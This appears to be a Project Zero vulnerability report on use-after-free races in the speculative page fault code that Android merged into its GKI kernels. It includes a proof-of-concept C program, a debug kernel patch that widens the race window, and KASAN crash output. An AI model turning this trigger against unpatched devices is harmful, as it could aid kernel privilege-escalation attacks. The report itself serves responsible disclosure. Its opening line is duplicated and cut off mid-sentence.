Android: GKI kernels contain broken non-upstream Speculative Page Faults MM code

A central recurring theme in Linux MM development is that contention on the
mmap lock can have a big ne Android: GKI kernels contain broken non-upstream Speculative Page Faults MM code

A central recurring theme in Linux MM development is that contention on the
mmap lock can have a big negative performance impact on multithreaded workloads:
If one thread is holding the mmap lock in exclusive mode for an extended amount
of time, other threads will block as soon as they try to handle a page fault.

Therefore there is a bunch of work to downgrade exclusive lock holders to
non-exclusive lock holders, shrink critical sections, and avoid holding the lock
altogether in some cases.

One proposal to avoid holding the mmap lock in page fault handling are
"Speculative page faults (SPF)"; here's a patch series from 2019 that had already
gone through 11 rounds of review:
<https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/>
This patch series didn't land at the time; but something along those lines might
land upstream in the next few years.

But for some reason, Android decided that they need speculative page faults
immediately, and merged the patches that were discussed on the upstream mailing
list into their GKI kernels. This is problematic for two reasons:

A) The MM code is complicated and easy to get wrong.
If you run MM code that has not been through the fuzzing, testing and review
that committed upstream code gets, there's a higher chance of undiscovered
bugs.
B) The SPF patches **change the rules** that MM code has to follow, so now
Android's version of MM has different rules than upstream MM.
This means that any patches in vaguely related parts of upstream MM need to
be checked by an Android engineer to see if they conflict with Android's
special rules.


As far as I can tell, there are a bunch of memory safety bugs in the SPF version
that is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):

1. handle_pte_fault() calls pmd_none() without protection against concurrent
page table deletion, leading to UAF read.
2. do_anonymous_page() calls pte_alloc() without protection against concurrent
page table deletion, leading to UAF write.
3. do_anonymous_page() calls pmd_trans_unstable() without protection against
concurrent page table deletion, leading to UAF read.
4. do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates
on a page table without protection against concurrent page table deletion,
leading to use-after-union-change read+write in struct page (on the page
table lock) and use-after-free read of a page table entry (resulting in bogus
page* calculation)
5. do_wp_page() calls handle_userfault() without protection against concurrent
userfaultfd_release(), leading to UAF reads of some flags from
userfaultfd_ctx.
I think back when the SPF series was posted upstream, there might have been
sufficient protection against this (because ___handle_speculative_fault()
bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd
support was added, and ___handle_speculative_fault() doesn't bail on
VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses
userfaultfd_pte_wp() which reads flags from the VMA.
6. The way seqcounts are used to detect concurrent writers looks wrong.
The seqcount API requires that only one writer at a time can be in a
vm_write_begin() / vm_write_end() section, but these helpers are used in
codepaths that only hold the mmap lock in shared mode, so there can be
concurrent writers.
As far as I can tell, this means that when there are an even number of
concurrent writers, it will look as if there are no active writers.
This _probably_ doesn't have much security impact because all of the places
that do vm_write_begin() where concurrency would be an actual problem seem to
hold the mmap lock in exclusive mode?

As an example, I tested issue 2. To reproduce this easily, I patched an extra
delay into the kernel:

```
diff --git a/mm/memory.c b/mm/memory.c
index 83b715ed65775..35ce412d0a965 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -84,6 +84,8 @@
#include <asm/tlb.h>
#include <asm/tlbflush.h>

+#include <linux/delay.h>
+
#include "pgalloc-track.h"
#include "internal.h"

@@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault *vmf)
vm_fault_t ret = 0;
pte_t entry;

+ if (strcmp(current->comm, "SLOWME") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {
+ pr_warn("%s: BEGIN DELAY 0x%lx
", __func__, vmf->address);
+ mdelay(2000);
+ pr_warn("%s: END DELAY 0x%lx
", __func__, vmf->address);
+ }
+
/* File mapping without ->vm_ops ? */
if (vmf->vma_flags & VM_SHARED)
return VM_FAULT_SIGBUS;
```

Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:
```
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/mman.h>

// basic idea:
// delete the 1G-covering page table while do_anonymous_page() is at its entry
// point

#define VMA_ADDR ((void*)0x40000000UL)
#define VMA_SIZE (0x40000000UL)

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

static void *thread_fn(void *dummy) {
SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
*(volatile char *)VMA_ADDR;
SYSCHK(prctl(PR_SET_NAME, "spfthread"));
}

int main(void) {
SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));
SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));
// create anon_vma and page tables
*(volatile char *)(VMA_ADDR+0x1000) = 1;

pthread_t thread;
if (pthread_create(&thread, NULL, thread_fn, NULL))
errx(1, "pthread_create");

sleep(1);
munmap(VMA_ADDR, VMA_SIZE);

if (pthread_join(thread, NULL))
errx(1, "pthread_join");
return 0;
}
```

This first results in a UAF read of a PTE:
```
do_anonymous_page: BEGIN DELAY 0x40000000
do_anonymous_page: END DELAY 0x40000000
==================================================================
BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)
Read of size 8 at addr ffff88800f358000 by task SLOWME/724

CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:120)
[...]
print_address_description.constprop.0 (mm/kasan/report.c:257)
[...]
[...]
kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460)
[...]
handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)
[...]
___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106)
[...]
__handle_speculative_fault (mm/memory.c:5148)
[...]
do_user_addr_fault (arch/x86/mm/fault.c:1320)
[...]
exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518)
[...]
asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571)
RIP: 0033:0x55d52bfe41fb
```

Then pte_alloc() tries to lock the page table entry:
```
BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112)
Read of size 4 at addr ffff88801a730004 by task SLOWME/724
```

and after that, it will write into the freed page table.


From a security perspective, my recommendation is to fix this by reverting the
speculative page fault patches out of the GKI trees, since I believe that such
a divergence from upstream semantics is not maintainable. Looking through the
commit history of the AOSP android13-5.10 kernel branch also shows that a series
of bugs have already been discovered that were introduced by SPF:

81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry
88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults
320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path
729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPF
c3cbea92297d5 ANDROID: mm: avoid writing to read-only elements
dd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handling
cf397c6c269ac ANDROID: mm: sync rss in speculative page fault path
531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page fault


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-02-01.

Please note that, according to our disclosure policy, if Project Zero discovers
a variant of a previously reported Project Zero bug, technical details of the
variant will be added to the existing Project Zero report (which may be already
public) and the report will not receive a new deadline.
Project Zero will consider new race conditions where the SPF fault path accesses
page tables or the VMA without sufficient locking variants of this issue.
This includes issues that are introduced after this bug is reported.
For more details, see
https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.

Related CVE Number: CVE-2023-20937.



Found by: jannh@google.com